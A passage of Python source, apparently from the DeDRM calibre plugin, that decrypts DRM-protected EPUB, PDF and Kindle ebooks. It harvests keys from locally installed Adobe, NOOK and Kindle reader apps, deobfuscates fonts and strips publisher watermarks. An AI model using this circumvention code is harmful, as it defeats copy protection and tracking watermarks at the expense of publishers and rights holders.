os.mkdir(self.pluginsdir)\n self.maindir = os.path.join(self.pluginsdir,\"DeDRM\")\n if not os.path.exists(self.maindir):\n os.mkdir(self.maindir)\n self.helpdir = os.path.join(self.maindir,\"help\")\n if not os.path.exists(self.helpdir):\n os.mkdir(self.helpdir)\n self.alfdir = os.path.join(self.maindir,\"libraryfiles\")\n if not os.path.exists(self.alfdir):\n os.mkdir(self.alfdir)\n # only continue if we've never run this version of the plugin before\n self.verdir = os.path.join(self.maindir,PLUGIN_VERSION)\n if not os.path.exists(self.verdir) and not iswindows and not isosx:\n\n names = [\"kindlekey.py\",\"adobekey.py\",\"ignoblekeyNookStudy.py\",\"utilities.py\",\"argv_utils.py\"]\n\n lib_dict = self.load_resources(names)\n print(\"{0} v{1}: Copying needed Python scripts from plugin's zip\".format(PLUGIN_NAME, PLUGIN_VERSION))\n\n for entry, data in lib_dict.items():\n file_path = os.path.join(self.alfdir, entry)\n try:\n os.remove(file_path)\n except:\n pass\n\n try:\n open(file_path,'wb').write(data)\n except:\n print(\"{0} v{1}: Exception when copying needed python scripts\".format(PLUGIN_NAME, PLUGIN_VERSION))\n traceback.print_exc()\n pass\n\n # mark that this version has been initialized\n os.mkdir(self.verdir)\n except Exception as e:\n traceback.print_exc()\n raise\n\n def postProcessEPUB(self, path_to_ebook):\n # This is called after the DRM is removed (or if no DRM was present)\n # It does stuff like de-obfuscating fonts (by calling checkFonts) \n # or removing watermarks. \n\n postProcessStart = time.time()\n\n try: \n import prefs\n dedrmprefs = prefs.DeDRM_Prefs()\n\n if dedrmprefs[\"deobfuscate_fonts\"] is True:\n # Deobfuscate fonts\n path_to_ebook = self.checkFonts(path_to_ebook) or path_to_ebook\n\n if dedrmprefs[\"remove_watermarks\"] is True:\n import epubwatermark as watermark\n\n # Remove Tolino's CDP watermark file\n path_to_ebook = watermark.removeCDPwatermark(self, path_to_ebook) or path_to_ebook\n\n # Remove watermarks (Amazon or LemonInk) from the OPF file\n path_to_ebook = watermark.removeOPFwatermarks(self, path_to_ebook) or path_to_ebook\n\n # Remove watermarks (Adobe, Pocketbook or LemonInk) from all HTML and XHTML files\n path_to_ebook = watermark.removeHTMLwatermarks(self, path_to_ebook) or path_to_ebook\n\n \n \n postProcessEnd = time.time()\n print(\"{0} v{1}: Post-processing took {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, postProcessEnd-postProcessStart))\n\n return path_to_ebook\n\n except: \n print(\"Error while checking settings\")\n return path_to_ebook\n\n def checkFonts(self, path_to_ebook):\n # This is called after the normal DRM removal is done. \n # It checks if there's fonts that need to be deobfuscated\n\n try: \n import epubfontdecrypt\n\n output = self.temporary_file(\".epub\").name\n ret = epubfontdecrypt.decryptFontsBook(path_to_ebook, output)\n\n if (ret == 0):\n return output\n elif (ret == 1):\n return path_to_ebook\n else:\n print(\"{0} v{1}: Error during font deobfuscation\".format(PLUGIN_NAME, PLUGIN_VERSION))\n raise DeDRMError(\"Font deobfuscation failed\")\n \n except: \n print(\"{0} v{1}: Error during font deobfuscation\".format(PLUGIN_NAME, PLUGIN_VERSION))\n traceback.print_exc()\n return path_to_ebook\n\n def ePubDecrypt(self,path_to_ebook):\n # Create a TemporaryPersistent file to work with.\n # Check original epub archive for zip errors.\n import zipfix\n\n inf = self.temporary_file(\".epub\")\n try:\n print(\"{0} v{1}: Verifying zip archive integrity\".format(PLUGIN_NAME, PLUGIN_VERSION))\n fr = zipfix.fixZip(path_to_ebook, inf.name)\n fr.fix()\n except Exception as e:\n print(\"{0} v{1}: Error \\'{2}\\' when checking zip archive\".format(PLUGIN_NAME, PLUGIN_VERSION, e.args[0]))\n raise\n\n # import the decryption keys\n import prefs\n dedrmprefs = prefs.DeDRM_Prefs()\n\n\n # import the LCP handler\n import lcpdedrm\n\n if (lcpdedrm.isLCPbook(path_to_ebook)):\n try: \n retval = lcpdedrm.decryptLCPbook(path_to_ebook, dedrmprefs['lcp_passphrases'], self)\n except:\n print(\"Looks like that didn't work:\")\n raise\n\n return self.postProcessEPUB(retval)\n \n\n # Not an LCP book, do the normal EPUB (Adobe) handling.\n\n # import the Adobe ePub handler\n import ineptepub\n\n if ineptepub.adeptBook(inf.name):\n\n if ineptepub.isPassHashBook(inf.name): \n # This is an Adobe PassHash / B&N encrypted eBook\n print(\"{0} v{1}: “{2}” is a secure PassHash-protected (B&N) ePub\".format(PLUGIN_NAME, PLUGIN_VERSION, os.path.basename(path_to_ebook)))\n\n # Attempt to decrypt epub with each encryption key (generated or provided).\n for keyname, userkey in dedrmprefs['bandnkeys'].items():\n print(\"{0} v{1}: Trying Encryption key {2:s}\".format(PLUGIN_NAME, PLUGIN_VERSION, keyname))\n of = self.temporary_file(\".epub\")\n\n # Give the user key, ebook and TemporaryPersistent file to the decryption function.\n try:\n result = ineptepub.decryptBook(userkey, inf.name, of.name)\n except:\n print(\"{0} v{1}: Exception when trying to decrypt after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n result = 1\n\n of.close()\n\n if result == 0:\n # Decryption was successful.\n # Return the modified PersistentTemporary file to calibre.\n return self.postProcessEPUB(of.name)\n\n print(\"{0} v{1}: Failed to decrypt with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n\n # perhaps we should see if we can get a key from a log file\n print(\"{0} v{1}: Looking for new NOOK Keys after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n\n # get the default NOOK keys\n defaultkeys = []\n\n ###### Add keys from the NOOK Study application (ignoblekeyNookStudy.py)\n\n try:\n defaultkeys_study = []\n if iswindows or isosx:\n from ignoblekeyNookStudy import nookkeys\n\n defaultkeys_study = nookkeys()\n else: # linux\n from wineutils import WineGetKeys\n\n scriptpath = os.path.join(self.alfdir,\"ignoblekeyNookStudy.py\")\n defaultkeys_study, defaultnames_study = WineGetKeys(scriptpath, \".b64\",dedrmprefs['adobewineprefix'])\n\n except:\n print(\"{0} v{1}: Exception when getting default NOOK Study Key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n \n\n ###### Add keys from the NOOK Microsoft Store application (ignoblekeyNookStudy.py)\n\n try:\n defaultkeys_store = []\n if iswindows:\n # That's a Windows store app, it won't run on Linux or MacOS anyways.\n # No need to waste time running Wine.\n from ignoblekeyWindowsStore import dump_keys as dump_nook_keys\n defaultkeys_store = dump_nook_keys(False)\n\n except:\n print(\"{0} v{1}: Exception when getting default NOOK Microsoft App keys after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n\n ###### Add keys from Adobe PassHash ADE activation data (adobekey_get_passhash.py)\n\n try: \n defaultkeys_ade = []\n if iswindows:\n # Right now this is only implemented for Windows. MacOS support still needs to be added.\n from adobekey_get_passhash import passhash_keys, ADEPTError\n try: \n defaultkeys_ade, names = passhash_keys()\n except ADEPTError:\n defaultkeys_ade = []\n if isosx:\n print(\"{0} v{1}: Dumping ADE PassHash data is not yet supported on MacOS.\".format(PLUGIN_NAME, PLUGIN_VERSION))\n defaultkeys_ade = []\n except:\n print(\"{0} v{1}: Exception when getting PassHashes from ADE after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n\n\n ###### Check if one of the new keys decrypts the book:\n\n newkeys = []\n for keyvalue in defaultkeys_study:\n if keyvalue not in dedrmprefs['bandnkeys'].values() and keyvalue not in newkeys:\n newkeys.append(keyvalue)\n\n if iswindows:\n for keyvalue in defaultkeys_store:\n if keyvalue not in dedrmprefs['bandnkeys'].values() and keyvalue not in newkeys:\n newkeys.append(keyvalue)\n\n for keyvalue in defaultkeys_ade:\n if keyvalue not in dedrmprefs['bandnkeys'].values() and keyvalue not in newkeys:\n newkeys.append(keyvalue)\n\n if len(newkeys) > 0:\n try:\n for i,userkey in enumerate(newkeys):\n\n if len(userkey) == 0:\n print(\"{0} v{1}: Skipping empty key.\".format(PLUGIN_NAME, PLUGIN_VERSION)) \n continue\n\n print(\"{0} v{1}: Trying a new default key\".format(PLUGIN_NAME, PLUGIN_VERSION))\n\n of = self.temporary_file(\".epub\")\n\n # Give the user key, ebook and TemporaryPersistent file to the decryption function.\n try:\n result = ineptepub.decryptBook(userkey, inf.name, of.name)\n except:\n print(\"{0} v{1}: Exception when trying to decrypt after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n result = 1\n\n of.close()\n\n if result == 0:\n # Decryption was a success\n # Store the new successful key in the defaults\n print(\"{0} v{1}: Saving a new default key\".format(PLUGIN_NAME, PLUGIN_VERSION))\n try:\n if userkey in defaultkeys_ade:\n dedrmprefs.addnamedvaluetoprefs('bandnkeys','ade_passhash_'+str(int(time.time())),keyvalue)\n else:\n dedrmprefs.addnamedvaluetoprefs('bandnkeys','nook_key_'+str(int(time.time())),keyvalue)\n dedrmprefs.writeprefs()\n print(\"{0} v{1}: Saved a new default key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n except:\n print(\"{0} v{1}: Exception saving a new default key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n # Return the modified PersistentTemporary file to calibre.\n return self.postProcessEPUB(of.name)\n\n print(\"{0} v{1}: Failed to decrypt with new default key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n return inf.name\n \n except:\n pass\n\n # Looks like we were unable to decrypt the book ...\n return inf.name\n\n else: \n # This is a \"normal\" Adobe eBook.\n\n book_uuid = None\n try: \n # This tries to figure out which Adobe account UUID the book is licensed for. \n # If we know that we can directly use the correct key instead of having to\n # try them all.\n book_uuid = ineptepub.adeptGetUserUUID(inf.name)\n except: \n pass\n\n if book_uuid is None: \n print(\"{0} v{1}: {2} is a secure Adobe Adept ePub\".format(PLUGIN_NAME, PLUGIN_VERSION, os.path.basename(path_to_ebook)))\n else: \n print(\"{0} v{1}: {2} is a secure Adobe Adept ePub for UUID {3}\".format(PLUGIN_NAME, PLUGIN_VERSION, os.path.basename(path_to_ebook), book_uuid))\n\n\n if book_uuid is not None: \n # Check if we have a key with that UUID in its name: \n for keyname, userkeyhex in dedrmprefs['adeptkeys'].items():\n if not book_uuid.lower() in keyname.lower(): \n continue\n\n # Found matching key\n print(\"{0} v{1}: Trying UUID-matched encryption key {2:s}\".format(PLUGIN_NAME, PLUGIN_VERSION, keyname))\n of = self.temporary_file(\".epub\")\n try: \n userkey = codecs.decode(userkeyhex, 'hex')\n result = ineptepub.decryptBook(userkey, inf.name, of.name)\n of.close()\n if result == 0:\n print(\"{0} v{1}: Decrypted with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n return self.postProcessEPUB(of.name)\n except ineptepub.ADEPTNewVersionError:\n print(\"{0} v{1}: Book uses unsupported (too new) Adobe DRM.\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n return self.postProcessEPUB(path_to_ebook)\n\n except:\n print(\"{0} v{1}: Exception when decrypting after {2:.1f} seconds - trying other keys\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n\n\n # Attempt to decrypt epub with each encryption key (generated or provided).\n for keyname, userkeyhex in dedrmprefs['adeptkeys'].items():\n \n print(\"{0} v{1}: Trying Encryption key {2:s}\".format(PLUGIN_NAME, PLUGIN_VERSION, keyname))\n of = self.temporary_file(\".epub\")\n\n # Give the user key, ebook and TemporaryPersistent file to the decryption function.\n try:\n userkey = codecs.decode(userkeyhex, 'hex')\n result = ineptepub.decryptBook(userkey, inf.name, of.name)\n except ineptepub.ADEPTNewVersionError:\n print(\"{0} v{1}: Book uses unsupported (too new) Adobe DRM.\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n return self.postProcessEPUB(path_to_ebook)\n except:\n print(\"{0} v{1}: Exception when decrypting after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n result = 1\n\n try:\n of.close()\n except:\n print(\"{0} v{1}: Exception closing temporary file after {2:.1f} seconds. Ignored.\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n\n if result == 0:\n # Decryption was successful.\n # Return the modified PersistentTemporary file to calibre.\n print(\"{0} v{1}: Decrypted with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n return self.postProcessEPUB(of.name)\n\n print(\"{0} v{1}: Failed to decrypt with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n\n # perhaps we need to get a new default ADE key\n print(\"{0} v{1}: Looking for new default Adobe Digital Editions Keys after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n\n # get the default Adobe keys\n defaultkeys = []\n\n try:\n if iswindows or isosx:\n from adobekey import adeptkeys\n\n defaultkeys, defaultnames = adeptkeys()\n else: # linux\n from wineutils import WineGetKeys\n\n scriptpath = os.path.join(self.alfdir,\"adobekey.py\")\n defaultkeys, defaultnames = WineGetKeys(scriptpath, \".der\",dedrmprefs['adobewineprefix'])\n\n except:\n print(\"{0} v{1}: Exception when getting default Adobe Key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n\n newkeys = []\n newnames = []\n idx = 0\n for keyvalue in defaultkeys:\n if codecs.encode(keyvalue, 'hex').decode('ascii') not in dedrmprefs['adeptkeys'].values():\n newkeys.append(keyvalue)\n newnames.append(\"default_ade_key_uuid_\" + defaultnames[idx])\n idx += 1\n\n # Check for DeACSM keys:\n try: \n from config import checkForDeACSMkeys\n\n newkey, newname = checkForDeACSMkeys()\n\n if newkey is not None: \n if codecs.encode(newkey, 'hex').decode('ascii') not in dedrmprefs['adeptkeys'].values():\n print(\"{0} v{1}: Found new key '{2}' in DeACSM plugin\".format(PLUGIN_NAME, PLUGIN_VERSION, newname))\n newkeys.append(newkey)\n newnames.append(newname)\n except:\n traceback.print_exc()\n pass\n\n if len(newkeys) > 0:\n try:\n for i,userkey in enumerate(newkeys):\n print(\"{0} v{1}: Trying a new default key\".format(PLUGIN_NAME, PLUGIN_VERSION))\n of = self.temporary_file(\".epub\")\n\n # Give the user key, ebook and TemporaryPersistent file to the decryption function.\n try:\n result = ineptepub.decryptBook(userkey, inf.name, of.name)\n except:\n print(\"{0} v{1}: Exception when decrypting after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n result = 1\n\n of.close()\n\n if result == 0:\n # Decryption was a success\n # Store the new successful key in the defaults\n print(\"{0} v{1}: Saving a new default key\".format(PLUGIN_NAME, PLUGIN_VERSION))\n try:\n dedrmprefs.addnamedvaluetoprefs('adeptkeys', newnames[i], codecs.encode(userkey, 'hex').decode('ascii'))\n dedrmprefs.writeprefs()\n print(\"{0} v{1}: Saved a new default key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n except:\n print(\"{0} v{1}: Exception when saving a new default key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n print(\"{0} v{1}: Decrypted with new default key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n # Return the modified PersistentTemporary file to calibre.\n return self.postProcessEPUB(of.name)\n\n print(\"{0} v{1}: Failed to decrypt with new default key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n except Exception as e:\n print(\"{0} v{1}: Unexpected Exception trying a new default key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n pass\n\n # Something went wrong with decryption.\n print(\"{0} v{1}: Ultimately failed to decrypt after {2:.1f} seconds. Read the FAQs at noDRM's repository: https://github.com/noDRM/DeDRM_tools/blob/master/FAQs.md\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n raise DeDRMError(\"{0} v{1}: Ultimately failed to decrypt after {2:.1f} seconds. Read the FAQs at noDRM's repository: https://github.com/noDRM/DeDRM_tools/blob/master/FAQs.md\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n\n\n\n # Not a Barnes & Noble nor an Adobe Adept\n # Probably a DRM-free EPUB, but we should still check for fonts.\n return self.postProcessEPUB(inf.name)\n\n \n def PDFIneptDecrypt(self, path_to_ebook):\n # Sub function to prevent PDFDecrypt from becoming too large ...\n import prefs\n import ineptpdf\n dedrmprefs = prefs.DeDRM_Prefs()\n\n book_uuid = None\n try: \n # Try to figure out which Adobe account this book is licensed for.\n book_uuid = ineptpdf.adeptGetUserUUID(path_to_ebook)\n except:\n pass\n\n if book_uuid is not None: \n print(\"{0} v{1}: {2} is a PDF ebook (EBX) for UUID {3}\".format(PLUGIN_NAME, PLUGIN_VERSION, os.path.basename(path_to_ebook), book_uuid))\n # Check if we have a key for that UUID\n for keyname, userkeyhex in dedrmprefs['adeptkeys'].items():\n if not book_uuid.lower() in keyname.lower():\n continue\n \n # Found matching key\n print(\"{0} v{1}: Trying UUID-matched encryption key {2:s}\".format(PLUGIN_NAME, PLUGIN_VERSION, keyname))\n of = self.temporary_file(\".pdf\")\n\n try: \n userkey = codecs.decode(userkeyhex, 'hex')\n result = ineptpdf.decryptBook(userkey, path_to_ebook, of.name)\n of.close()\n if result == 0:\n print(\"{0} v{1}: Decrypted with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n return of.name\n \n except ineptpdf.ADEPTNewVersionError:\n print(\"{0} v{1}: Book uses unsupported (too new) Adobe DRM.\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n return path_to_ebook\n except:\n print(\"{0} v{1}: Exception when decrypting after {2:.1f} seconds - trying other keys\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n\n\n # If we end up here, we didn't find a key with a matching UUID, so lets just try all of them.\n\n # Attempt to decrypt PDF with each encryption key (generated or provided). \n for keyname, userkeyhex in dedrmprefs['adeptkeys'].items():\n userkey = codecs.decode(userkeyhex,'hex')\n print(\"{0} v{1}: Trying encryption key {2:s}\".format(PLUGIN_NAME, PLUGIN_VERSION, keyname))\n of = self.temporary_file(\".pdf\")\n\n # Give the user key, ebook and TemporaryPersistent file to the decryption function.\n try:\n result = ineptpdf.decryptBook(userkey, path_to_ebook, of.name)\n except ineptpdf.ADEPTNewVersionError:\n print(\"{0} v{1}: Book uses unsupported (too new) Adobe DRM.\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n return path_to_ebook\n except:\n print(\"{0} v{1}: Exception when decrypting after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n result = 1\n\n of.close()\n\n if result == 0:\n # Decryption was successful.\n # Return the modified PersistentTemporary file to calibre.\n print(\"{0} v{1}: Decrypted with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n return of.name\n\n print(\"{0} v{1}: Failed to decrypt with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n\n # perhaps we need to get a new default ADE key\n print(\"{0} v{1}: Looking for new default Adobe Digital Editions Keys after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n\n # get the default Adobe keys\n defaultkeys = []\n\n try:\n if iswindows or isosx:\n from adobekey import adeptkeys\n\n defaultkeys, defaultnames = adeptkeys()\n else: # linux\n from wineutils import WineGetKeys\n\n scriptpath = os.path.join(self.alfdir,\"adobekey.py\")\n defaultkeys, defaultnames = WineGetKeys(scriptpath, \".der\",dedrmprefs['adobewineprefix'])\n\n except:\n print(\"{0} v{1}: Exception when getting default Adobe Key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n\n newkeys = []\n newnames = []\n idx = 0\n for keyvalue in defaultkeys:\n if codecs.encode(keyvalue,'hex') not in dedrmprefs['adeptkeys'].values():\n newkeys.append(keyvalue)\n newnames.append(\"default_ade_key_uuid_\" + defaultnames[idx])\n idx += 1\n\n # Check for DeACSM keys:\n try: \n from config import checkForDeACSMkeys\n\n newkey, newname = checkForDeACSMkeys()\n\n if newkey is not None: \n if codecs.encode(newkey, 'hex').decode('ascii') not in dedrmprefs['adeptkeys'].values():\n print(\"{0} v{1}: Found new key '{2}' in DeACSM plugin\".format(PLUGIN_NAME, PLUGIN_VERSION, newname))\n newkeys.append(newkey)\n newnames.append(newname)\n except:\n traceback.print_exc()\n\n if len(newkeys) > 0:\n try:\n for i,userkey in enumerate(newkeys):\n print(\"{0} v{1}: Trying a new default key\".format(PLUGIN_NAME, PLUGIN_VERSION))\n of = self.temporary_file(\".pdf\")\n\n # Give the user key, ebook and TemporaryPersistent file to the decryption function.\n try:\n result = ineptpdf.decryptBook(userkey, path_to_ebook, of.name)\n except:\n print(\"{0} v{1}: Exception when decrypting after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n result = 1\n\n of.close()\n\n if result == 0:\n # Decryption was a success\n # Store the new successful key in the defaults\n print(\"{0} v{1}: Saving a new default key\".format(PLUGIN_NAME, PLUGIN_VERSION))\n try:\n dedrmprefs.addnamedvaluetoprefs('adeptkeys', newnames[i], codecs.encode(userkey,'hex').decode('ascii'))\n dedrmprefs.writeprefs()\n print(\"{0} v{1}: Saved a new default key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n except:\n print(\"{0} v{1}: Exception when saving a new default key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n # Return the modified PersistentTemporary file to calibre.\n return of.name\n\n print(\"{0} v{1}: Failed to decrypt with new default key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n except Exception as e:\n traceback.print_exc()\n\n\n # Unable to decrypt the PDF with any of the existing keys. Is it a B&N PDF?\n # Attempt to decrypt PDF with each encryption key (generated or provided). \n for keyname, userkey in dedrmprefs['bandnkeys'].items():\n print(\"{0} v{1}: Trying Encryption key {2:s}\".format(PLUGIN_NAME, PLUGIN_VERSION, keyname))\n of = self.temporary_file(\".pdf\")\n\n # Give the user key, ebook and TemporaryPersistent file to the decryption function.\n try:\n result = ineptpdf.decryptBook(userkey, path_to_ebook, of.name, False)\n except ineptpdf.ADEPTNewVersionError:\n print(\"{0} v{1}: Book uses unsupported (too new) Adobe DRM.\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n return path_to_ebook\n except:\n print(\"{0} v{1}: Exception when decrypting after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n result = 1\n\n of.close()\n\n if result == 0:\n # Decryption was successful.\n # Return the modified PersistentTemporary file to calibre.\n print(\"{0} v{1}: Decrypted with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n return of.name\n\n print(\"{0} v{1}: Failed to decrypt with key {2:s} after {3:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,keyname,time.time()-self.starttime))\n\n def PDFStandardDecrypt(self, path_to_ebook):\n # Sub function to prevent PDFDecrypt from becoming too large ...\n import prefs\n import ineptpdf\n dedrmprefs = prefs.DeDRM_Prefs()\n\n # Attempt to decrypt PDF with each encryption key (generated or provided). \n i = -1\n for userpassword in [\"\"] + dedrmprefs['adobe_pdf_passphrases']:\n # Try the empty password, too.\n i = i + 1\n userpassword = bytearray(userpassword, \"utf-8\")\n if i == 0:\n print(\"{0} v{1}: Trying empty password ... \".format(PLUGIN_NAME, PLUGIN_VERSION), end=\"\")\n else:\n print(\"{0} v{1}: Trying password {2} ... \".format(PLUGIN_NAME, PLUGIN_VERSION, i), end=\"\")\n of = self.temporary_file(\".pdf\")\n\n # Give the user password, ebook and TemporaryPersistent file to the decryption function.\n msg = False\n try:\n result = ineptpdf.decryptBook(userpassword, path_to_ebook, of.name)\n print(\"done\")\n msg = True\n except ineptpdf.ADEPTInvalidPasswordError:\n print(\"invalid password\".format(PLUGIN_NAME, PLUGIN_VERSION))\n msg = True\n result = 1\n except:\n print(\"exception\\n{0} v{1}: Exception when decrypting after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n msg = True\n traceback.print_exc()\n result = 1\n if not msg:\n print(\"error\\n{0} v{1}: Failed to decrypt after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime))\n\n of.close()\n\n if result == 0:\n # Decryption was successful.\n # Return the modified PersistentTemporary file to calibre.\n print(\"{0} v{1}: Successfully decrypted with password {3} after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION,time.time()-self.starttime, i))\n return of.name\n \n print(\"{0} v{1}: Didn't manage to decrypt PDF. Make sure the correct password is entered in the settings.\".format(PLUGIN_NAME, PLUGIN_VERSION))\n\n \n \n def PDFDecrypt(self,path_to_ebook):\n import prefs\n import ineptpdf\n import lcpdedrm\n dedrmprefs = prefs.DeDRM_Prefs()\n\n if (lcpdedrm.isLCPbook(path_to_ebook)):\n try: \n retval = lcpdedrm.decryptLCPbook(path_to_ebook, dedrmprefs['lcp_passphrases'], self)\n except:\n print(\"Looks like that didn't work:\")\n raise\n\n return retval\n \n # Not an LCP book, do the normal Adobe handling.\n\n pdf_encryption = ineptpdf.getPDFencryptionType(path_to_ebook)\n if pdf_encryption is None:\n print(\"{0} v{1}: {2} is an unencrypted PDF file - returning as is.\".format(PLUGIN_NAME, PLUGIN_VERSION, os.path.basename(path_to_ebook)))\n return path_to_ebook\n\n print(\"{0} v{1}: {2} is a PDF ebook with encryption {3}\".format(PLUGIN_NAME, PLUGIN_VERSION, os.path.basename(path_to_ebook), pdf_encryption))\n\n if pdf_encryption == \"EBX_HANDLER\":\n # Adobe eBook / ADEPT (normal or B&N)\n return self.PDFIneptDecrypt(path_to_ebook)\n elif pdf_encryption == \"Standard\" or pdf_encryption == \"Adobe.APS\":\n return self.PDFStandardDecrypt(path_to_ebook)\n elif pdf_encryption == \"FOPN_fLock\" or pdf_encryption == \"FOPN_foweb\":\n print(\"{0} v{1}: FileOpen encryption '{2}' is unsupported.\".format(PLUGIN_NAME, PLUGIN_VERSION, pdf_encryption))\n print(\"{0} v{1}: Try the standalone script from the 'Tetrachroma_FileOpen_ineptpdf' folder in the Github repo.\".format(PLUGIN_NAME, PLUGIN_VERSION))\n return path_to_ebook\n else:\n print(\"{0} v{1}: Encryption '{2}' is unsupported.\".format(PLUGIN_NAME, PLUGIN_VERSION, pdf_encryption))\n return path_to_ebook\n\n\n def KindleMobiDecrypt(self,path_to_ebook):\n\n # add the alfcrypto directory to sys.path so alfcrypto.py\n # will be able to locate the custom lib(s) for CDLL import.\n sys.path.insert(0, self.alfdir)\n # Had to move this import here so the custom libs can be\n # extracted to the appropriate places beforehand these routines\n # look for them.\n import prefs\n import k4mobidedrm\n\n dedrmprefs = prefs.DeDRM_Prefs()\n pids = dedrmprefs['pids']\n serials = dedrmprefs['serials']\n for android_serials_list in dedrmprefs['androidkeys'].values():\n #print android_serials_list\n serials.extend(android_serials_list)\n #print serials\n androidFiles = []\n kindleDatabases = list(dedrmprefs['kindlekeys'].items())\n\n try:\n book = k4mobidedrm.GetDecryptedBook(path_to_ebook,kindleDatabases,androidFiles,serials,pids,self.starttime)\n except Exception as e:\n decoded = False\n # perhaps we need to get a new default Kindle for Mac/PC key\n defaultkeys = []\n print(\"{0} v{1}: Failed to decrypt with error: {2}\".format(PLUGIN_NAME, PLUGIN_VERSION,e.args[0]))\n\n traceback.print_exc()\n\n print(\"{0} v{1}: Looking for new default Kindle Key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n\n try:\n if iswindows or isosx:\n from kindlekey import kindlekeys\n\n defaultkeys = kindlekeys()\n defaultnames = []\n else: # linux\n from wineutils import WineGetKeys\n\n scriptpath = os.path.join(self.alfdir,\"kindlekey.py\")\n defaultkeys, defaultnames = WineGetKeys(scriptpath, \".k4i\",dedrmprefs['kindlewineprefix'])\n except:\n print(\"{0} v{1}: Exception when getting default Kindle Key after {2:.1f} seconds\".format(PLUGIN_NAME, PLUGIN_VERSION, time.time()-self.starttime))\n traceback.print_exc()\n pass\n\n newkeys = {}\n newnames = []\n\n for i,keyvalue in enumerate(defaultkeys):\n if keyvalue not in dedrmprefs['kindlekeys'].values():\n newkeys[\"key_{0:d}\".format(i)] = keyvalue\n\n if len(newkeys) > 0:\n print(\"{0} v{1}: Found {2} new {3}\".format(PLUGIN_NAME, PLUGIN_VERSION, len(newkeys), \"key\" if len(newkeys)==1 else \"keys\"))\n try:\n book = k4mobidedrm.GetDecryptedBook(path_to_ebook,newkeys.items(),[],[],[],self.starttime)\n decoded = 